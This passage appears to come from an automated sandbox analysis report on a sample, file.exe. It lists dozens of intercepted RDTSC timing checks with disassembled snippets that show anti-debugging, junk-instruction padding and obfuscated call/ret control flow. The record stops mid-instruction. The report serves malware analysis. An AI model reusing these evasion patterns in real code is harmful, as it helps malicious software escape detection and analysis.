                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13414F8 second address: 13414FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13414FE second address: 134150C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007EFD80CDE8C6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134150C second address: 1341510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341510 second address: 1341516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341834 second address: 134183A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134183A second address: 134183E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134183E second address: 1341848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134199A second address: 13419A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341CB3 second address: 1341CBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007EFD80CCF026h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341E14 second address: 1341E27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007EFD80CDE8C6h 0x00000009 js 00007EFD80CDE8C6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13444DA second address: 13444E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13444E0 second address: 11C1D57 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD80CDE8CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 0C36EBD5h 0x00000011 mov dword ptr [ebp+122D3005h], eax 0x00000017 push dword ptr [ebp+122D02F5h] 0x0000001d movsx ecx, cx 0x00000020 call dword ptr [ebp+122D21C2h] 0x00000026 pushad 0x00000027 pushad 0x00000028 call 00007EFD80CDE8D9h 0x0000002d push ecx 0x0000002e pop eax 0x0000002f pop ebx 0x00000030 jmp 00007EFD80CDE8D0h 0x00000035 popad 0x00000036 xor eax, eax 0x00000038 mov dword ptr [ebp+122D2D08h], edx 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 jmp 00007EFD80CDE8D6h 0x00000047 mov dword ptr [ebp+122D2B3Eh], eax 0x0000004d jmp 00007EFD80CDE8D3h 0x00000052 mov esi, 0000003Ch 0x00000057 add dword ptr [ebp+122D2D08h], eax 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 sub dword ptr [ebp+122D2CECh], ebx 0x00000067 lodsw 0x00000069 or dword ptr [ebp+122D3035h], edx 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 sub dword ptr [ebp+122D24D1h], ecx 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d stc 0x0000007e nop 0x0000007f push ebx 0x00000080 push eax 0x00000081 push edx 0x00000082 jp 00007EFD80CDE8C6h 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344592 second address: 13445B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD80CCF039h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13445B0 second address: 13445D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007EFD80CDE8D2h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13445D2 second address: 13445D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13445D6 second address: 13445DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13445DA second address: 13445ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13445ED second address: 13445FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13445FC second address: 1344692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007EFD80CCF035h 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop eax 0x0000000f mov edi, dword ptr [ebp+122D17CEh] 0x00000015 call 00007EFD80CCF036h 0x0000001a jnp 00007EFD80CCF026h 0x00000020 pop esi 0x00000021 push 00000003h 0x00000023 mov di, ax 0x00000026 push 00000000h 0x00000028 mov edx, dword ptr [ebp+122D24EDh] 0x0000002e push 00000003h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007EFD80CCF028h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov esi, dword ptr [ebp+122D2A4Eh] 0x00000050 push B4254946h 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 jmp 00007EFD80CCF036h 0x0000005d pop ecx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344692 second address: 1344703 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD80CDE8DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 0BDAB6BAh 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007EFD80CDE8C8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b add edx, dword ptr [ebp+122D2C22h] 0x00000031 movsx edx, di 0x00000034 lea ebx, dword ptr [ebp+124563EDh] 0x0000003a mov dword ptr [ebp+122D25AAh], edx 0x00000040 push eax 0x00000041 pushad 0x00000042 jo 00007EFD80CDE8C8h 0x00000048 push edx 0x00000049 pop edx 0x0000004a pushad 0x0000004b jns 00007EFD80CDE8C6h 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344A71 second address: 1344A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344A75 second address: 1344A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364803 second address: 1364809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364809 second address: 1364820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD80CDE8CCh 0x0000000b popad 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364BE3 second address: 1364BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364BE9 second address: 1364BF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364BF2 second address: 1364C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007EFD80CCF038h 0x0000000d pop eax 0x0000000e jl 00007EFD80CCF032h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364C1B second address: 1364C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364C21 second address: 1364C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364D68 second address: 1364D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8D5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364D81 second address: 1364D9D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007EFD80CCF026h 0x0000000f jmp 00007EFD80CCF02Ch 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364D9D second address: 1364DB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364DB1 second address: 1364DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13651BE second address: 13651D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136543C second address: 1365442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1365442 second address: 1365448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1365594 second address: 13655A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF030h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13655A8 second address: 13655D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007EFD80CDE8D3h 0x00000010 jmp 00007EFD80CDE8CDh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136572D second address: 1365731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135CC76 second address: 135CC87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 jnl 00007EFD80CDE8C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135CC87 second address: 135CCB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jg 00007EFD80CCF03Eh 0x0000000f push esi 0x00000010 jnl 00007EFD80CCF026h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1365F89 second address: 1365F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1366422 second address: 1366445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF032h 0x00000009 jmp 00007EFD80CCF02Ch 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1366445 second address: 136645E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136645E second address: 1366462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1366462 second address: 1366493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007EFD80CDE90Bh 0x0000000e pushad 0x0000000f jmp 00007EFD80CDE8D3h 0x00000014 jo 00007EFD80CDE8C6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1366493 second address: 1366497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C960 second address: 136C964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371835 second address: 1371854 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFD80CCF026h 0x00000008 jmp 00007EFD80CCF035h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371854 second address: 1371859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334853 second address: 133487B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF02Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007EFD80CCF035h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133487B second address: 133488B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007EFD80CDE8C6h 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133488B second address: 1334899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFD80CCF026h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334899 second address: 133489F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133489F second address: 13348B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFD80CCF031h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13348B9 second address: 13348D8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFD80CDE8C6h 0x00000008 jmp 00007EFD80CDE8CDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007EFD80CDE8C6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13348D8 second address: 13348DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1370F86 second address: 1370F90 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD80CDE8C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13710D7 second address: 1371100 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007EFD80CCF038h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jne 00007EFD80CCF026h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371100 second address: 1371110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFD80CDE8C6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371110 second address: 1371114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371114 second address: 137112F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jne 00007EFD80CDE8C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13713ED second address: 13713F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13713F1 second address: 1371428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007EFD80CDE8CCh 0x0000000f jmp 00007EFD80CDE8D5h 0x00000014 popad 0x00000015 jmp 00007EFD80CDE8CBh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371581 second address: 1371597 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007EFD80CCF026h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1371597 second address: 13715A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13715A1 second address: 13715A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13732B4 second address: 13732C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CDE8CEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13733B6 second address: 13733CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF034h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373985 second address: 13739C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007EFD80CDE8D2h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFD80CDE8CCh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373DAB second address: 1373DBC instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFD80CCF028h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373EF7 second address: 1373EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373FBD second address: 1373FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF02Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov esi, dword ptr [ebp+122D17B1h] 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 jmp 00007EFD80CCF02Eh 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13744D9 second address: 1374513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD80CDE8D8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFD80CDE8D6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1374EFB second address: 1374F22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFD80CCF039h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1374F22 second address: 1374F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1374F26 second address: 1374FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jp 00007EFD80CCF026h 0x0000000d pop ebx 0x0000000e popad 0x0000000f nop 0x00000010 mov esi, dword ptr [ebp+122D2A26h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007EFD80CCF028h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 jo 00007EFD80CCF02Ch 0x00000038 mov edi, dword ptr [ebp+122D1CBBh] 0x0000003e push 00000000h 0x00000040 or dword ptr [ebp+122D2CECh], edx 0x00000046 xchg eax, ebx 0x00000047 push edx 0x00000048 jng 00007EFD80CCF03Bh 0x0000004e jmp 00007EFD80CCF035h 0x00000053 pop edx 0x00000054 push eax 0x00000055 jp 00007EFD80CCF044h 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007EFD80CCF032h 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137662F second address: 1376633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377356 second address: 1377370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF036h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377370 second address: 137739C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007EFD80CDE8C6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377DA8 second address: 1377DB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007EFD80CCF026h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377DB6 second address: 1377E60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 call 00007EFD80CDE8D5h 0x0000000d jmp 00007EFD80CDE8D2h 0x00000012 pop edi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007EFD80CDE8C8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1BD2h], eax 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007EFD80CDE8C8h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 00000017h 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 js 00007EFD80CDE8CCh 0x00000057 sub dword ptr 